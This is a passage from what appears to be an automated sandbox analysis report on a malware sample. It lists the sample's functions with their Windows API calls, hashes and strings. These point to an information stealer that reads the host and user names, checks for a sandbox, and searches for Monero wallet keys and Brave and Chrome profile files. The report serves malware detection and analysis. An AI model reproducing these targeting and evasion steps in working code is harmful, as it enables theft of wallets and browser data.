                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 9961c10b14ec883463a4b763c23496f47b5ac78fdc238ab52e5842a224c818fc
                        • Instruction ID: 4b9f7bafa06d655eac075d518b156145c92ebaf7b0fa267707b93e9ccdfdd39a
                        • Opcode Fuzzy Hash: 9961c10b14ec883463a4b763c23496f47b5ac78fdc238ab52e5842a224c818fc
                        • Instruction Fuzzy Hash: F1113730900549ABCB24FF78DD5AEEE7B38BF90300F40455BF80A56292EF30AB05C655
                        Function 005D78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D7917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 005D792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 582c7cce5b4226eab5fada319362ebe8905d6a7d1568bbd697d37c21736908df
                        • Instruction ID: 38b616a67557aed78acc41f7989e7fd9bee834a5efdae10ad245ff00115fa58c
                        • Opcode Fuzzy Hash: 582c7cce5b4226eab5fada319362ebe8905d6a7d1568bbd697d37c21736908df
                        • Instruction Fuzzy Hash: 1D0162B1944308EBC754DF99DD45BAEBBB8F704B21F10422BE545A2380D37559008BA1
                        Function 005C1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005C112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 005C1132
                        • ExitProcess.KERNEL32 ref: 005C1143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 7840be79c25533bf99f70daf02398af62b3ffc9e6b979ddea7ffa7dfe94d823e
                        • Instruction ID: 2aefb516ae61910127a9f9d855f97bfb8fca6d290966aedc98d2998632b0534a
                        • Opcode Fuzzy Hash: 7840be79c25533bf99f70daf02398af62b3ffc9e6b979ddea7ffa7dfe94d823e
                        • Instruction Fuzzy Hash: 7AE0E67094530CFFE7546BE09C0EF097A78FB05B01F104054F709765D1D6B56640969D
                        Function 005C10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005C10B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005C10F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 7cbeaa21daf0ef96239c35ff2433d02f6ef468e84be8e1f486e1f7a964c1cd2f
                        • Instruction ID: 9581d0087a47889db32ffca7f3159c50b8613af3d89c038548fc876b3e08e6f7
                        • Opcode Fuzzy Hash: 7cbeaa21daf0ef96239c35ff2433d02f6ef468e84be8e1f486e1f7a964c1cd2f
                        • Instruction Fuzzy Hash: 4CF0E271641308BBE7149BA8AC5DFBABBECF705B15F305448F544E3280D5719F00CAA5
                        Function 005C1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005D7910
                          • Part of subcall function 005D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005D7917
                          • Part of subcall function 005D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005D792F
                          • Part of subcall function 005D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005C11B7), ref: 005D7880
                          • Part of subcall function 005D7850: RtlAllocateHeap.NTDLL(00000000), ref: 005D7887
                          • Part of subcall function 005D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005D789F
                        • ExitProcess.KERNEL32 ref: 005C11C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 5e63a06c775bb3996704bbe3065eac787109728a8e84a53843366e1a59ae493a
                        • Instruction ID: 8bc5def5b4e8317a175e063f7df4357a43f9ff5e2d373d7ebe62dce03ef8bed0
                        • Opcode Fuzzy Hash: 5e63a06c775bb3996704bbe3065eac787109728a8e84a53843366e1a59ae493a
                        • Instruction Fuzzy Hash: E4E012B591430657CA6473F8AC1EF2A3A9C7B55749F08042BFA05D2743FA29E800C56A

                        Non-executed Functions

                        Function 005D38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005D38CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D38E3
                        • lstrcat.KERNEL32(?,?), ref: 005D3935
                        • StrCmpCA.SHLWAPI(?,005E0F70), ref: 005D3947
                        • StrCmpCA.SHLWAPI(?,005E0F74), ref: 005D395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D3C67
                        • FindClose.KERNEL32(000000FF), ref: 005D3C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 809e56dd172ee83d748b1cdeeb46f7a5582e48d1ebbab0fe175cf400369cfb0a
                        • Instruction ID: 85570706b40dd094eed60c605e550a97e95adc8ec8b730cead1895de3f223952
                        • Opcode Fuzzy Hash: 809e56dd172ee83d748b1cdeeb46f7a5582e48d1ebbab0fe175cf400369cfb0a
                        • Instruction Fuzzy Hash: 7DA161B2A003099BDB74DFA4DC89FEE7778BF84300F04459AA55D96241EB719B84CF62
                        Function 005CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • FindFirstFileA.KERNEL32(00000000,?,005E0B32,005E0B2B,00000000,?,?,?,005E13F4,005E0B2A), ref: 005CBEF5
                        • StrCmpCA.SHLWAPI(?,005E13F8), ref: 005CBF4D
                        • StrCmpCA.SHLWAPI(?,005E13FC), ref: 005CBF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CC7BF
                        • FindClose.KERNEL32(000000FF), ref: 005CC7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 87f8c377e237251298e87c588b8c25db8498e5ec5eb3c0465c95e7d68d002c64
                        • Instruction ID: ced39297e5830989829e35be0d7400e6b3312986573e5802016ccf152377d137
                        • Opcode Fuzzy Hash: 87f8c377e237251298e87c588b8c25db8498e5ec5eb3c0465c95e7d68d002c64
                        • Instruction Fuzzy Hash: 4F4268729001055BCF24FBB4DD9AEEE7B7CBBC4300F40455AF90A96281EE349B49CB96
                        Function 005D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005D492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D4943
                        • StrCmpCA.SHLWAPI(?,005E0FDC), ref: 005D4971
                        • StrCmpCA.SHLWAPI(?,005E0FE0), ref: 005D4987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D4B7D
                        • FindClose.KERNEL32(000000FF), ref: 005D4B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 49d8ffedd40db942ea8b2cc20a1c97dd29ffc24788259fcf879fce1afec4b86e
                        • Instruction ID: 3cb1046a9cb3ddf2e4d830ffac0ae4c5d0bcdfa541edc1d06143541fc56a1a9e
                        • Opcode Fuzzy Hash: 49d8ffedd40db942ea8b2cc20a1c97dd29ffc24788259fcf879fce1afec4b86e
                        • Instruction Fuzzy Hash: 956194B2900218ABCB34EBA4DC49FEA777CBB88300F048599F54996141EB71EB85CF91
                        Function 005D4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 005D4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D4587
                        • wsprintfA.USER32 ref: 005D45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D45BD
                        • StrCmpCA.SHLWAPI(?,005E0FC4), ref: 005D45EB
                        • StrCmpCA.SHLWAPI(?,005E0FC8), ref: 005D4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D468B
                        • FindClose.KERNEL32(000000FF), ref: 005D46A0
                        • lstrcat.KERNEL32(?,014B0D70), ref: 005D46C5
                        • lstrcat.KERNEL32(?,014AF488), ref: 005D46D8
                        • lstrlen.KERNEL32(?), ref: 005D46E5
                        • lstrlen.KERNEL32(?), ref: 005D46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 5096bc40139e92145d14796a51a95c1afc3784c4bae9df5c786f83787019982a
                        • Instruction ID: 43ee727643590e9c159cf20d1631189c9edf66a3ada0a7b6d089a4845706f45e
                        • Opcode Fuzzy Hash: 5096bc40139e92145d14796a51a95c1afc3784c4bae9df5c786f83787019982a
                        • Instruction Fuzzy Hash: 915176B55403189BCB64EBB4DC89FED777CBB54300F008599B65A92190EB74DB84CF92
                        Function 005D3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005D3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 005D3EDA
                        • StrCmpCA.SHLWAPI(?,005E0FAC), ref: 005D3F08
                        • StrCmpCA.SHLWAPI(?,005E0FB0), ref: 005D3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005D406C
                        • FindClose.KERNEL32(000000FF), ref: 005D4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 4f68652e2e3aefaf394e1f053f6960c7f08050d1fab9366158c9521807684744
                        • Instruction ID: 58e560abdc7d37d89d6892856b6e8116c01ab08e3bc08fc2cf1e5570268b5451
                        • Opcode Fuzzy Hash: 4f68652e2e3aefaf394e1f053f6960c7f08050d1fab9366158c9521807684744
                        • Instruction Fuzzy Hash: FB5158B5900219ABCB34FBB4DC49EEE777CBB84300F00859AB65996180DB75DB85CF91
                        Function 005CED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 005CED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 005CED55
                        • StrCmpCA.SHLWAPI(?,005E1538), ref: 005CEDAB
                        • StrCmpCA.SHLWAPI(?,005E153C), ref: 005CEDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 005CF2AE
                        • FindClose.KERNEL32(000000FF), ref: 005CF2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
